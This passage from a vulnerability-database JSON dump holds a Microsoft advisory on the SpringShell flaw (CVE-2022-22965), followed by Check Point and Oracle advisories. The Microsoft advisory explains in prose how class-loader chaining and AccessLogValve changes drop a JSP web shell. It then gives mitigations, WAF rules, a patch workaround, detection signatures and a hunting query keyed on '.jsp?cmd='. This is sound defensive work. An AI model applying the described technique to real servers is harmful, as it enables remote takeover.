If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor that gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. 
Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. 
\n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. 
New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. 
If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search for the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If this call is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder){\n String[]abd=new String[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts can indicate an observed attack, but might not be unique to exploitation of this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### 
Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS. It also matches only requests whose inspected fields contain `.jsp?cmd=`, so treat an empty result as inconclusive rather than as evidence that no exploitation occurred.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempts (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts_ table includes only the device name of the affected device. This query joins the _DeviceInfo_ table to clearly connect other information such as device group, IP address, signed in users, and others. 
This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mssecure", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_security": [{"lastseen": "2022-05-19T07:30:12", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22946>), [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>), and [CVE-2022-22950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. 
We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). \nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. 
In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T07:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", 
"CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T07:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2022-05-05T23:28:11", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. 
Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353", "CVE-2017-14159", "CVE-2017-17740", "CVE-2017-9287", "CVE-2018-1000067", "CVE-2018-1000068", "CVE-2018-1000192", "CVE-2018-1000193", "CVE-2018-1000194", "CVE-2018-1000195", "CVE-2018-11212", "CVE-2018-1285", "CVE-2018-1999001", "CVE-2018-1999002", "CVE-2018-1999003", "CVE-2018-1999004", "CVE-2018-1999005", "CVE-2018-1999007", "CVE-2018-2601", "CVE-2018-6356", "CVE-2018-8032", "CVE-2019-0227", "CVE-2019-1003049", "CVE-2019-1003050", "CVE-2019-10086", "CVE-2019-10247", "CVE-2019-10383", "CVE-2019-10384", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-13038", "CVE-2019-13057", 
"CVE-2019-13565", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-14822", "CVE-2019-14862", "CVE-2019-16785", "CVE-2019-16786", "CVE-2019-16789", "CVE-2019-16792", "CVE-2019-17195", "CVE-2019-17571", "CVE-2019-18218", "CVE-2019-18276", "CVE-2019-19603", "CVE-2019-20388", "CVE-2019-20838", "CVE-2019-20916", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3799", "CVE-2019-5827", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10693", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11612", "CVE-2020-11971", "CVE-2020-11979", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13935", "CVE-2020-13936", "CVE-2020-13956", "CVE-2020-14155", "CVE-2020-14340", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15358", "CVE-2020-15719", "CVE-2020-16135", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-25659", "CVE-2020-27218", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28895", "CVE-2020-29363", "CVE-2020-29582", "CVE-2020-35198", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5245", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-6950", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-7760", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8231", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9488", "CVE-2021-20231", "CVE-2021-20232", "CVE-2021-20289", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-21703", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22132", "CVE-2021-22134", "CVE-2021-22144", "CVE-2021-22145", 
"CVE-2021-22569", "CVE-2021-22570", "CVE-2021-22696", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2427", "CVE-2021-2464", "CVE-2021-2471", "CVE-2021-25219", "CVE-2021-26291", "CVE-2021-27568", "CVE-2021-27645", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28168", "CVE-2021-28169", "CVE-2021-28170", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-30468", "CVE-2021-3156", "CVE-2021-31799", "CVE-2021-31810", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-3200", "CVE-2021-32066", "CVE-2021-32626", "CVE-2021-32627", "CVE-2021-32628", "CVE-2021-32672", "CVE-2021-32675", "CVE-2021-32687", "CVE-2021-32762", "CVE-2021-32785", "CVE-2021-32786", "CVE-2021-32791", "CVE-2021-32792", "CVE-2021-33037", "CVE-2021-33193", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-33813", "CVE-2021-33880", "CVE-2021-34429", "CVE-2021-3445", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3521", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35574", "CVE-2021-3572", "CVE-2021-3580", "CVE-2021-35942", "CVE-2021-36084", "CVE-2021-36085", "CVE-2021-36086", "CVE-2021-36087", "CVE-2021-36090", "CVE-2021-36160", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3690", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37714", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41099", "CVE-2021-41164", "CVE-2021-41165", 
"CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4181", "CVE-2021-4182", "CVE-2021-4183", "CVE-2021-4184", "CVE-2021-4185", "CVE-2021-41973", "CVE-2021-42013", "CVE-2021-42340", "CVE-2021-42392", "CVE-2021-42717", "CVE-2021-43395", "CVE-2021-43527", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-44224", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0391", "CVE-2022-0778", "CVE-2022-20612", "CVE-2022-20613", "CVE-2022-20614", "CVE-2022-20615", "CVE-2022-21271", "CVE-2022-21375", "CVE-2022-21384", "CVE-2022-21404", "CVE-2022-21405", "CVE-2022-21409", "CVE-2022-21410", "CVE-2022-21411", "CVE-2022-21412", "CVE-2022-21413", "CVE-2022-21414", "CVE-2022-21415", "CVE-2022-21416", "CVE-2022-21417", "CVE-2022-21418", "CVE-2022-21419", "CVE-2022-21420", "CVE-2022-21421", "CVE-2022-21422", "CVE-2022-21423", "CVE-2022-21424", "CVE-2022-21425", "CVE-2022-21426", "CVE-2022-21427", "CVE-2022-21430", "CVE-2022-21431", "CVE-2022-21434", "CVE-2022-21435", "CVE-2022-21436", "CVE-2022-21437", "CVE-2022-21438", "CVE-2022-21440", "CVE-2022-21441", "CVE-2022-21442", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-21445", "CVE-2022-21446", "CVE-2022-21447", "CVE-2022-21448", "CVE-2022-21449", "CVE-2022-21450", "CVE-2022-21451", "CVE-2022-21452", "CVE-2022-21453", "CVE-2022-21454", "CVE-2022-21457", "CVE-2022-21458", "CVE-2022-21459", "CVE-2022-21460", "CVE-2022-21461", "CVE-2022-21462", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21465", "CVE-2022-21466", "CVE-2022-21467", "CVE-2022-21468", "CVE-2022-21469", "CVE-2022-21470", "CVE-2022-21471", "CVE-2022-21472", "CVE-2022-21473", "CVE-2022-21474", "CVE-2022-21475", "CVE-2022-21476", "CVE-2022-21477", "CVE-2022-21478", "CVE-2022-21479", "CVE-2022-21480", "CVE-2022-21481", "CVE-2022-21482", "CVE-2022-21483", "CVE-2022-21484", "CVE-2022-21485", "CVE-2022-21486", "CVE-2022-21487", "CVE-2022-21488", 
"CVE-2022-21489", "CVE-2022-21490", "CVE-2022-21491", "CVE-2022-21492", "CVE-2022-21493", "CVE-2022-21494", "CVE-2022-21496", "CVE-2022-21497", "CVE-2022-21498", "CVE-2022-21716", "CVE-2022-21824", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23437", "CVE-2022-23852", "CVE-2022-23943", "CVE-2022-23990", "CVE-2022-24329", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315"], "modified": "2022-05-04T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}